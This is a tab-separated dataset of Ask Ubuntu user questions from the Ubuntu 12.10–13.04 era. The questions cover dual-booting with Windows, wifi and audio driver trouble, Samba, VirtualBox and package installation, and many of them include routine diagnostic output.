289533	hide ubuntu partition in win7	i was searching forum but i did n't find solution to my problem . i 've installed ubuntu 13.04 and win7 on one hdd in uefi mode . i 'm able to boot in both os'es separately from grub ( added some entries ) . the problem is when i boot into win7 i 'm able to see linux partition as raw ( in explorer , and only main partition , swap is hidden ) . when i double-click it then i 'm asked to format this partition . all i want to do is hide/unmount/not mounting it while booting system . is it possible to do this ? any help is appreciated .
289534	install a program from a directory with all of its dependencies	suppose i have a directory in which i have .deb packages for two programs with all there dependencies . i want to know if there is a apt or dpkg command , or another program to install one out of these two programs with all their dependencies . the dependencies should be installed automatically as i install the program .
289535	bring back `backspace` keyboard shortcuts on nautilus and thunar	i want to use the `` backspace '' button as a shortcut key on nautilus . i want to return to the previous folder whilst browsing the home folder , just like windows 7 . also i want the same thing while using firefox , in a way that when i press the shortcut key i will return to the previous web page .
289537	how can i view stdout/stderr of a startup application ?	some of the commands that i have in startup applications do not start properly when i login . ( in particular i am having trouble with gtk-redshift . ) in order to debug , i would like to be able to view stdout/stderr . i have n't found a log file for startup applications . i have tried redirecting to a file using `` > > log.txt '' with no success . how can i see stdout/stderr for a startup application ? better yet , is there a log file for startup applications ?
289542	how to open vdb files under ubuntu ?	i 'm working with a software that uses vdb ( vistadb ) to archive log files , while everyone else uses windows and can use the vistadb software , i 'm unable to do so using my ubuntu os , does anyone knows how can those file be viewed under linux ?
289544	ssh vs smb vs nfs for gui file transfer	i am using ubuntu 12.04 on many computers at my school ( i am a teacher and the head tech dude ) . i use clonezilla to massively clone desktops and laptops . i want to easily share the disk images between computers in order to back things up . i tried sharing over our wireless network using samba , and i did get it to work , but it was painfully slow trying to transfer 3gb+ . it was much faster over the wired network , but i still had connectivity issues . correct me if i 'm wrong but i understand that samba is based on a windows standard , and that ssh is more linux-native . my experience with samba has not been favorable so far . nfs seems to have more features than samba . i think this is what mac os uses by default . so , my question is : what is the best gui way to share files between two ubuntu machines with the following priorities in descending order : speed free and open source easy setup compatible with windows and mac os
289547	where are flex libraries located ?	i find myself with a very weird problem in my hands . i wanted to install both flex ( the fast lexical analyzer ) and bison , and that 's why i ran : sudo apt-get install bison flex the installation goes on without errors and , as a matter of fact , if i type dpkg -l flex i end up with a list of entries which includes /usr/lib and , in that path , i expect to find the flex libraries ( which as far as i know are libfl.a or libfl.so , depending if the installation was shared or static ) , but , lo and behold , there 's no libfl library under /usr/lib , and using find -l 'libfl.a ' ( or 'libfl.so ' ) returns only no such file or directory i 'm completely puzzled ... where should flex libraries be located ? thanks
289549	missing files have disappeared	i extracted my files from a memory card and put them in a folder , formatted my memory card , and after restart the files are not in the folder on the hard disk . is there a way to return them ? i did n't create symbolic links , nor shortcuts . i used ctrl+c -- - > ctrl+v the folder is still there , but there is nothing inside of it .
289552	how to backup ubuntu partition via windows ?	i wanted to make a backup of my ubuntu ( 12.04 ) partition before upgrading to 13.04 , but i 've come up against a snag . none of the tools i can find can make an image of the currently-mounted drive - and , for obvious reasons , it 's not possible to unmount the drive which is currently used as / . the ubuntu partition is the only one in my system that does n't use ntfs , and all of the boot-from-cd options i 've found warn against trying to save to ntfs from a livecd . my system is a dual-boot with windows 7 , so i figured it might be possible to use that to make the image , thereby getting around both of the problems ( not having the linux partition mounted and safely saving to ntfs ) - but my google-fu is coming up short and all i can seem to find is a ) tools for imaging an ntfs partition from within linux ( the opposite to my problem ) or b ) tools for just reading individual files from ext ( not the most helpful , as they do n't give any write capabilities for restoring ) . is there any way of doing this ?
289558	python idle offline installer	ubuntu 12.04 lts . surprisingly , idle is not included by default . python is there . i prefer to download tar.gz or .deb installer for idle . googled to look for it , but could not find . where can i get the installer for idle ? thanks , vineet
289559	how can i create a windows bootable usb stick with ubuntu ?	i 'd like to create a windows 8 bootable usb stick , but i do n't have a windows machine with me to do so . so how do i do it with ubuntu/linux ?
289562	dual boot windows 8 and ubuntu uefi ! ca n't load windows 8 anymore	i have a samsung laptop with windows 8 single language pre installed and since it was bugging so much i decided to dual boot with ubuntu following this guide : http : //www.linuxbsdos.com/2013/03/12/dual-boot-windows-8-and-ubuntu-12-04-in-uefi-mode/ i was able to install ubuntu , and could load both from ubuntu boot loader . i had an issue where in my bios , in my boot priority all entries were gone except ubuntu . then second issue , i could n't load windows boot manager even after following the guide . so i tried playing with the easybcd and i screwed up by deleting all entries in windows boot manager . now , even on ubuntu boot loader , i ca n't load windows . on the ubuntu boot loader i see about 5-8 entries , 3-4 of them from ubuntu and the rest is some *x64.efi and recovery boots . i tried all of them and could n't load windows . either file is not found or when i go in windows boot manager , no operating system detected . i do n't know what to do , i ca n't have access to my windows 8 any help please ? note that i could boot windows 8 from ubuntu loader by pressing enter on some **x64.efi but could n't since i played with easybcd . here is a paste of boot repair i just did http : //paste.ubuntu.com/5623621/
289563	partition wiped after distribution update	my problem : a partition and its files disappeared unbeknownst to me , most likely after updating from 12.10 to 13.04 ( though not sure ) . before ubuntu 12.10 i was running windows 7 , with a hard drive of 250 gb partitioned in two : drive c and drive d. the former for system files , the latter for personal files . i formatted the c drive and installed ubuntu 12.10 onto it from a live cd . afterwards , drive d and its files were available under an icon in the launcher , similar to the one that appears after connecting a usb stick or an external hard drive . the drive was also available through a folder in home\media . the first moment i noticed it gone was after the update to ubuntu 13.04 . it 's gone . i have done nothing i can think of to trigger it . i ran multiple searches on the entire filesystem querying filenames i surefire knew were on that partition , with no result . anyone can help ? edit 1 : release upgrade was done via the default software updater from within ubuntu 12.10 edit 2 : output from sudo fdisk -l via terminal : > disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 > sectors/track , 30401 cylinders , total 488397168 sectors units = > sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 > bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes > disk identifier : 0x000a1062 > > device boot start end blocks id system > /dev/sda1 * 2048 499711 248832 83 linux > /dev/sda2 501758 488396799 243947521 5 extended > /dev/sda5 501760 488396799 243947520 8e linux lvm > > disk /dev/mapper/ubuntu-root : 247.7 gb , 247661068288 bytes 255 heads , > 63 sectors/track , 30109 cylinders , total 483713024 sectors units = > sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 > bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes > disk identifier : 0x00000000 > > disk /dev/mapper/ubuntu-root does n't contain a valid partition table > > disk /dev/mapper/ubuntu-swap_1 : 2134 mb , 2134900736 bytes 255 heads , > 63 sectors/track , 259 cylinders , total 4169728 sectors units = sectors > of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 > bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk > identifier : 0x00000000 edit 3 : output from sudo blkid via terminal : > /dev/sda1 : uuid= '' a41e3612-9597-43cc-87c8-9234ff3eeece '' type= '' ext2 '' > /dev/sda5 : uuid= '' xpdn1e-g8g0-zhet-ddui-qfcf-7d2t-5pqqux '' type= '' lvm2_member '' > /dev/mapper/ubuntu-root : uuid= '' 8015cbb9-38ed-4a82-8b92-67c80a2ab1eb '' type= '' ext4 '' > /dev/mapper/ubuntu-swap_1 : uuid= '' 5d5096ba-623b-4da0-b133-429388b606df '' type= '' swap ''
289565	webcam in virtualbox ( ubuntu guest/ubuntu host )	i have already read the following questions : unable to start webcam in ubuntu + virtual box use my webcam with ubuntu running in virtualbox integrated webcam can not be used in virtualbox guest xp and yet i still have problems getting my webcam ( lenovo easy camera ) to work under virtualbox in an ubuntu ( 12.04 ) host . the host machine is a lenovo ideapad u410 running ubuntu 12.10 . in the host machine the camera is not listed in lsusb , yet works fine with all applications ( listed under /dev/video0 ) . i was wondering if there is anyway to get the camera working in the guest machine . lsusb in host : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 13d3:5163 imc networks bus 003 device 003 : id 8087:07da intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub p.s . even though running an ubuntu guest inside an ubuntu host machine ( inception ! ) sounds idiotic , i have some good reasons for that !
289566	i am afraid to install nvidia drivers and break stuff	i 'm currently running 13.04 on my production machine ( which i rely heavily on for work ) . i currently do n't have any external storage to do ssd clone to , but i 'm really temped to install nvidia drivers . the nouveau ones are just too bad , the unity feels sluggish , there is tearing of screen in even basic terminal apps like vim , browsers are slow and choppy , youtube takes 10 seconds to switch to fullscreen . i'be been running 13.04 beta1 for a while , and i had installed nvidia drivers from blob , and manually linked opengl 32bit libraries . it worked for a while , but crashed the system miserably few updates later . also , i am running customly compiled kernel ( basically 3.8.0-19-generic that ships with 13.04 anyway , just having 1 commit removed which breaks sound ) . i have kernel-headers with it too . i am tempted to use additional drivers utility to install drivers , but i know it has never ever worked for me in the past . i do n't know if binary blob from nvidia.com is safe either . what would be the safest way to install drivers at this point ? i will try and get some hdd to make a backup tomorrow . p.s . : never had problems with kmod-nvidia in fedora . i 'm new to ubuntu tho . card is 560ti .
289569	available ram not being used	i am running a program that takes a significant amount of time to complete . according to my system monitor , only 20 % of the available memory is being used ( 1.6gib out of 7.7gib available ) . i 'm wondering why is the available memory not being used ? any information would be greatly appreciated .
289574	can not run samba interface after installing 13.04	i can not get the samba interface to run after installing 13.04 . i installed samba through the software center on one machine , and through terminal sudo apt-get install samba system-config-samba cifs-utils on another with the same result . the problem is the same with both machines - typing `` samba '' in dash gives no result . ( nothing shows up ) .
289578	is it possible to install win8 next to an encrypted ubuntu ?	i run ubuntu on an sdd ( encrypted with systemtools since installation ) . so i want to install windows 8 on a second partion on the same drive , but it is possible to do so , without chrashing anything , because windows could overwrite parts of the encrypted ubuntu system ? i hope you can answer my question or give me a little help ; ) thanks for all answers i can get .
289582	wifi issues after upgrade to 13.04 from 12.10 - hp envy dv6 quad core with rt2800pci	this started happening after upgrading ... about 2 days ago . i have a verizon fios ( wireless ) router ... and the moment i step away from the room ( approx . 20 feet away ) where it is located , my wireless connection goes down ... i have pasted my syslog output below . bottom line is it disconnects and then keeps popping up a wireless authentication dialog , fails to connect after i input the password and then eventually drops the wifi connection . i have seen a lot of wifi issues reported with the 13.04 upgrade ... appreciate your help . note that with 12.10 , this would happen occasionally ( maybe once a week ) but seemed to have no correlation to distance from router ... and i would reboot to fix . but with 13.04 , its unusable . lspci output : lspci | egrep -i `` network|wireless|ethernet '' 0a:00.0 network controller : ralink corp. device 539b 0b:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 07 ) lshw output ( for network ) : *-pci:3 description : pci bridge product : 7 series/c210 series chipset family pci express root port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:19 memory:74500000-745fffff *-network description : wireless interface product : ralink corp. vendor : ralink corp. physical id : 0 bus info : pci @ 0000:0a:00.0 logical name : wlan0 version : 00 serial : 9c:2a:70:0b:81:5b width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.8.0-19-generic firmware=0.34 ip=192.168.1.28 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:19 memory:74500000-7450ffff syslog ( from the time i move away onwards , until prompt for wifi password ) : may 2 10:07:22 athena wpa_supplicant [ 1224 ] : wlan0 : wpa : group rekeying completed with 00:7f:28:52:65 : b9 [ gtk=ccmp ] may 2 10:07:25 wpa_supplicant [ 1224 ] : last message repeated 3 times may 2 10:07:25 athena kernel : [ 2073.235743 ] wlan0 : deauthenticated from 00:7f:28:52:65 : b9 ( reason : 2 ) may 2 10:07:25 athena wpa_supplicant [ 1224 ] : wlan0 : ctrl-event-disconnected bssid=00:7f:28:52:65 : b9 reason=2 may 2 10:07:25 athena kernel : [ 2073.260107 ] cfg80211 : calling crda to update world regulatory domain may 2 10:07:25 athena networkmanager [ 1173 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected may 2 10:07:25 athena kernel : [ 2073.265935 ] cfg80211 : world regulatory domain updated : may 2 10:07:25 athena kernel : [ 2073.265940 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 2 10:07:25 athena kernel : [ 2073.265944 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 2 10:07:25 athena kernel : [ 2073.265947 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 2 10:07:25 athena kernel : [ 2073.265949 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 2 10:07:25 athena kernel : [ 2073.265951 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 2 10:07:25 athena kernel : [ 2073.265954 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 2 10:07:25 athena kernel : [ 2073.266200 ] cfg80211 : calling crda for country : us may 2 10:07:25 athena kernel : [ 2073.271606 ] cfg80211 : regulatory domain changed to country : us may 2 10:07:25 athena kernel : [ 2073.271612 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 2 10:07:25 athena kernel : [ 2073.271618 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) may 2 10:07:25 athena kernel : [ 2073.271623 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) may 2 10:07:25 athena kernel : [ 2073.271627 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 2 10:07:25 athena kernel : [ 2073.271631 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 2 10:07:25 athena kernel : [ 2073.271635 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 2 10:07:25 athena kernel : [ 2073.271639 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) may 2 10:07:25 athena networkmanager [ 1173 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning may 2 10:07:26 athena wpa_supplicant [ 1224 ] : wlan0 : sme : trying to authenticate with 00:7f:28:52:65 : b9 ( ssid='10177-2 ' freq=2437 mhz ) may 2 10:07:26 athena kernel : [ 2074.059525 ] wlan0 : authenticate with 00:7f:28:52:65 : b9 may 2 10:07:26 athena networkmanager [ 1173 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating may 2 10:07:26 athena wpa_supplicant [ 1224 ] : wlan0 : trying to associate with 00:7f:28:52:65 : b9 ( ssid='10177-2 ' freq=2437 mhz ) may 2 10:07:26 athena kernel : [ 2074.074818 ] wlan0 : send auth to 00:7f:28:52:65 : b9 ( try 1/3 ) may 2 10:07:26 athena kernel : [ 2074.076306 ] wlan0 : authenticated may 2 10:07:26 athena kernel : [ 2074.078370 ] wlan0 : associate with 00:7f:28:52:65 : b9 ( try 1/3 ) may 2 10:07:26 athena networkmanager [ 1173 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating may 2 10:07:26 athena wpa_supplicant [ 1224 ] : wlan0 : associated with 00:7f:28:52:65 : b9 may 2 10:07:26 athena kernel : [ 2074.085032 ] wlan0 : rx assocresp from 00:7f:28:52:65 : b9 ( capab=0x431 status=0 aid=7 ) may 2 10:07:26 athena kernel : [ 2074.085155 ] wlan0 : associated may 2 10:07:26 athena kernel : [ 2074.085264 ] cfg80211 : calling crda for country : us may 2 10:07:26 athena networkmanager [ 1173 ] : < info > ( wlan0 ) : supplicant interface state : associating - > 4-way handshake may 2 10:07:26 athena kernel : [ 2074.091115 ] cfg80211 : regulatory domain changed to country : us may 2 10:07:26 athena kernel : [ 2074.091120 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp )
289584	qt creator blank debug screen	when debugging my first phone app in ubuntu i get a blank black screen environment : virtual box os : ubuntu i have attached the terminal out put here http : //pastebin.com/mfsdh1kv my unity test output /usr/lib/nux/unity_support_test -p opengl warning : glflushvertexarrayrangenv not found in mesa table opengl warning : glvertexarrayrangenv not found in mesa table opengl warning : glcombinerinputnv not found in mesa table opengl warning : glcombineroutputnv not found in mesa table opengl warning : glcombinerparameterfnv not found in mesa table opengl warning : glcombinerparameterfvnv not found in mesa table opengl warning : glcombinerparameterinv not found in mesa table opengl warning : glcombinerparameterivnv not found in mesa table opengl warning : glfinalcombinerinputnv not found in mesa table opengl warning : glgetcombinerinputparameterfvnv not found in mesa table opengl warning : glgetcombinerinputparameterivnv not found in mesa table opengl warning : glgetcombineroutputparameterfvnv not found in mesa table opengl warning : glgetcombineroutputparameterivnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterfvnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterivnv not found in mesa table opengl warning : gldeletefencesnv not found in mesa table opengl warning : glfinishfencenv not found in mesa table opengl warning : glgenfencesnv not found in mesa table opengl warning : glgetfenceivnv not found in mesa table opengl warning : glisfencenv not found in mesa table opengl warning : glsetfencenv not found in mesa table opengl warning : gltestfencenv not found in mesa table opengl vendor string : humper opengl renderer string : chromium opengl version string : 2.1 chromium 1.9 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
289586	unable to open a xls file in openoffice 3.2	i am unable to open a xls file in openoffice 3.2 . but the same file is getting opened in other system which has the same oo version . but in this when i open the file i get a pop-up window with import options = > select the language to use for import and in that windows automatic option is already choosed giving ok opens the file without any error . but this pop is not happening in the other system , instead it is showing the following screen . how do i fix it ? update 1 : $ file rad.xls rad.xls : html document , ascii text , with very long lines , with crlf , lf line terminators both the systems have displayed the same output . but in one system the file is getting opened , and in other its not opening . both has the same version of openoffice .
289595	how to upgrade ubuntu12.10 to 13.04 in 30 minutes ?	i tried to upgrade my ubuntu 12.10 to 13.04 , it works correctly.but so slow.is there any way for faster upgrade ?
289596	no sound in headset when ubuntu is installed	i have windows 7 and ubuntu 13.04 on my pc . recently i upgraded from 12.10 . my ubuntu installation seem to mess with my windows especially on sound front . my headset seem to be not working at all.when i uninstalled ubuntu from windows , the headset worked very well . but when i install ubuntu inside windows , my headset goes kaput . anyone experienced this problem ? can anyone offer a solution to my problem ?
289600	searching for menu entries in desktop environments other than unity	does any other desktop environment have the type-to-search-application-menus feature found in unity ? iâm curios about trying a more spartan desktop such as xfce or lxde . or maybe something entirely different . but i want to keep the workflow where i can press the alt key from any application and type my way to menu entries .
289605	audio only on honker after upgrade to 12.10/13.04	i 'm using a dell optiplex 980 . under 12.04 , the line speakers worked fine , but after upgrading to 12.10 yesterday , the only audio output was through the built-in pc speaker with nothing going to the speakers connected via analog port . thinking this might have been a problem with 12.10 , i just kept going and went to 13.04 . same problem . going into sound settings only shows `` speakers/built-in audio '' . snd-hda-intel is loaded , but i do n't know why pulseaudio is n't seeing it . argh !
289607	unable to boot ubuntu 13.04 ( 64 bit )	i downloaded ubuntu 13.04 and installed it into a usb drive . both things were apparently finished correctly . but after rebooting my pc , i saw the splash screen then came to the desktop but i could see mouse pointer and panel with pink color background . but suddenly that vanished and the screen went to black . after long time mouse pointer appeared with black screen . no any graphical sign . how do i install ubuntu ? i use dual core 2.7 ghz prosesor with on board vga . i had no problem with ubuntu 12.04 and i used 12.04 without any trouble . please anybody help me . i am not good at english . thank you .
289609	dell 3721 wifi problem ubuntu 13.04	i have a dell 3721 which comes original with windows 8 . i managed it to install ubuntu 12.10 on this laptop , even there was no out of the box drivers . with 12.10 i was forces to install this .deb package couple of times . after installing it , it was ok for some weeks before i have to install it again . maybe some security updates destroy something which made in necessary to install it again ... http : //jas.gemnetworks.com/debian/pool/main/w/wireless-bcm43142/wireless-bcm43142-dkms_6.20.55.19-1_amd64.deb my problem is , that this package isnt working with ubuntu 13.04 anymore . so i cant use wifi now . also my display is almost dark , i cant change the brightness level with ubuntu 13.04 . hope you can give me some advice . dell : ~ $ sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm76 express chipset lpc controller [ 8086:1e59 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) 02:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) @ dell : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0a5c:21d7 broadcom corp . bus 001 device 004 : id 0bda:0129 realtek semiconductor corp . bus 001 device 005 : id 0c45:64ad microdia @ dell : ~ $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) @ dell : ~ $ sudo lshw -class network *-network beschreibung : ethernet interface produkt : rtl8101e/rtl8102e pci express fast ethernet controller hersteller : realtek semiconductor co. , ltd. physische id : 0 bus-informationen : pci @ 0000:01:00.0 logischer name : eth0 version : 05 seriennummer : xx : xx : xx : xx : xx : xx größe : 100mbit/s kapazität : 100mbit/s breite : 64 bits takt : 33mhz fähigkeiten : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation konfiguration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.2.103 latency=0 link=yes multicast=yes port=mii speed=100mbit/s ressourcen : irq:42 ioport:2000 ( größe=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff *-network ungefordert beschreibung : network controller produkt : bcm43142 802.11b/g/n hersteller : broadcom corporation physische id : 0 bus-informationen : pci @ 0000:02:00.0 version : 01 breite : 64 bits takt : 33mhz fähigkeiten : pm msi pciexpress bus_master cap_list konfiguration : latency=0 ressourcen : memory : c0500000-c0507fff
289616	help me find a tutorial to dual boot windows 7 and ubuntu 13.04	what i 've got is a compatible pc with both systems , windows 7 and ubuntu 13.04 , i 've windows 7 already installed , now i want to install ubuntu , and be able to choose which one i want to boot when i power my computer on . first time i tried it , i did n't watch any tutorial , installed ubuntu on another partition from windows 7 ( d ) , and got that partition deleted , lost many files but i just want to have ubuntu and have some experience with it ! any help is much appreciated !
289621	do n't automatically open the folder of mounted devices	i usually charge my phone through a usb connection . due to ubuntu 13.04 detecting and mounting it , nautlius automatically opens the mounted folder . can i stop nautlius from automatically opening the folder of some mounted devices ?
289622	virtualbox4.2 kills lightdm	i just installed virtualbox4.2 on ubuntu 13.04 . when i open virtualbox , all seems well , until i try to create an new vm , at which point , lightdm crashes , and i am forced ( eventually ) back to the login screen . is anyone running virtaulbox in ubuntu 13.04 and having the same issue ? does anyone know a fix to this ? here is what looks like relivent dmesg info [ 19.575962 ] vboxdrv : found 2 processor cores . [ 19.578171 ] vboxdrv : fasync=1 offmin=0x13c76d offmax=0x13c76d [ 19.580595 ] vboxdrv : tsc mode is 'asynchronous ' , kernel timer mode is 'normal ' . [ 19.580603 ] vboxdrv : successfully loaded version 4.2.12 ( interface 0x001a0004 ) . [ 19.957340 ] vboxpci : iommu not found ( not registered ) [ 22.450277 ] init : plymouth-upstart-bridge main process ( 1020 ) killed by term signal [ 22.864046 ] de2104x 0000:01:06.0 eth0 : link up , media 10baset-hd [ 22.864074 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 25.435531 ] audit_printk_skb : 78 callbacks suppresse [ 25.435543 ] type=1400 audit ( 1367507475.203:38 ) : apparmor= '' denied '' operation= '' open '' parent=1366 profile= '' /sbin/dhclient '' name= '' /var/lib/networkmanager/dhclient6-eth0.conf '' pid=1824 comm= '' dhclient '' requested_mask= '' r '' denied_mask= '' r '' fsuid=0 ouid=0 [ 261.756237 ] warning : `virtualbox ' uses 32-bit capabilities ( legacy support in use )
289626	tortoisehg wo n't run in 13.04	i upgraded last week to 13.04 ( via fresh install ) and have separately attempted to install tortoisehg using software center and command line , both apparently successful . the problem is when i try to launch the application , nothing happens . i have also tried to launch from commandline using thg , but again without success . is it likely that i have missed a dependency , or is there a problem with tortoise in 13.04 ?
289629	how do i install python2.7 in ubuntu 12.10 ?	i am trying to install python2.7 for educational purposes in ubuntu 12.10 . any help would be most appreciated .
289631	xuost 13.04 - mouse pointer invisible after upgrade	i just installed 13.04 and i could n't help but notice that the mouse pointer is invisible on the desktop . it appears in apps once i manage to launch them with the invisible pointer . help ! ps this is a vmware vm , and i do n't think that 's relevant in this case , but you never know ... . pps i am able to see the pointer on `` xubuntu session '' and default ( which looks to be `` xubuntu session '' ) desktops . fortunately , i had a bunch of desktops installed . i 'm still working on this - i just upgraded - if i come up with a solution , i 'll be sure to post . next , i will try a different login screen ( using gde , presently ... . )
289635	accidentally wiped out hard disk with windows 8 while installing ubuntu 13.04 , is there any way to recover ?	i brought my dell inspiron 15r ( 5521 ) laptop yesterday only , i tried to installing ubuntu 13.04 as i go along with installation ( i selected first option for selecting disk ) i think wiped out entire hard disk there . when i reboot my machine it says- [ checking media ] - failed [ checking media ] - failed and then '' no bootable device found , please enter any key to reboot '' i wanted to create dual boot machine with windows 8 and ubuntu . i little confused what went wrong . is there any way i can get back my original windows 8 ? so that i will able to install ubuntu again . ( i did n't created any backup disk neither i have windows 8 dvd ) . please help .
289638	how to fix this dash background distortion ?	i downloaded ubuntu 13.04 and chose to try it first . this mess of shapes and colours is what i got to see : apparently the dash 's background is being distorted .
289648	can not install gtk+3.6.4	when trying to run the ./configure for gtk+-3.6.4 i get the following : requested 'glib-2.0 > = 2.35.3 ' but version of glib is 2.34.0 requested 'atk > = 2.7.5 ' but version of atk is 2.4.0 requested 'pango > = 1.32.4 ' but version of pango is 1.30.0 requested 'gdk-pixbuf-2.0 > = 2.27.1 ' but version of gdkpixbuf is 2.26.1 i downloaded the latest tars and installed them all with ./configure & & make then as root make install without an issue , but the problem persists . i 'm running a fresh installation of 12.0.4.2 64bit with all other updates performed before i even started trying to install gtk3.6.4 .
289657	ubuntu 13.04 mounts iphone disk spaces and after a while unmounts them	iphone 4 , ios 6.1.3 , ubuntu 13.04 on 12.10 and before , i could mount my iphone without problems . ubuntu mounted automagically two `` shares '' , `` iphone '' and `` documents on iphone '' , and you can access your files there . if you setup itunes on a windows virtual machine , you can even sync your music ! but ... on version 13.04 , ubuntu mounts three iphone `` shares '' , the previous two and another one called `` internal storage '' , which points to the dcim photo directory . the thing is , after a while ( ~5min ) , everything is unmounted except this `` internal storage '' . for what i have been reading and testing , it seems like systemd is killing usbmuxd because it runs as root . the old sysv init did n't have a problem with that . if you run usbmuxd manually and as root ( sudo ) the thing works . any one experiencing the same behaviour ?
289658	in : no such command - trying to create a symlink and 'in ' does not work	i 'm using a ubuntu 12.10 server ( an amazon aws ec2 instance ) and i need to create a symlink which needs the in command but this appears not to be installed . the message i get is in : no such command i 've tried to man in but no joy there . i 've tried to apt-get install in but the package does n't seem to exist either . my main problem in trying to solve this issue is that googling around in does n't really give you the correct results so i 'm struggling to diagnose this . is in not installed commonly as a command by default , and if not does anyone know how to get it ? many thanks
